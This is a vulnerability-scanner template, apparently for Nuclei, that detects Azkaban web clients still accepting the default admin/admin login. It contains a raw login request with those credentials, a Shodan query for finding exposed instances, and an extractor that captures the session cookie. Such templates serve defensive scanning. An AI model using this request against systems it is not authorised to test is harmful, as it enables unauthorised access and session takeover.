Vulnerability Description
Azkaban is a batch workflow job scheduler created at LinkedIn to run Hadoop jobs. Default web client credentials were discovered.
id: azkaban-default-login
info:
  name: Azkaban Web Client Default Credential
  author: pussycat0x
  severity: high
  description: Azkaban is a batch workflow job scheduler created at LinkedIn to run Hadoop jobs. Default web client credentials were discovered.
  classification:
    cwe-id: CWE-798
    cpe: cpe:2.3:a:azkaban_project:azkaban:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    shodan-query: http.title:"Azkaban Web Client"
    product: azkaban
    vendor: azkaban_project
  tags: default-login,azkaban,vuln
http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        action=login&username={{username}}&password={{password}}
    payloads:
      username:
        - admin
      password:
        - admin
    attack: pitchfork
    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"session.id"'
          - '"success"'
        condition: and
      - type: word
        words:
          - 'azkaban.browser.session.id'
          - 'application/json'
        condition: and
        part: header
      - type: status
        status:
          - 200
    extractors:
      - type: kval
        kval:
          - azkaban.browser.session.id
# digest: 4a0a00473045022100ff9729c80dfbd89838f95543a2e8ec4ae82980ad52f54126bf3d0b537007d5cf022053f35537e0112a08e555a5769e781e666fc3a47038e1b25082ba854d9ffaf027:922c64590222798bb761d5b6d8e72950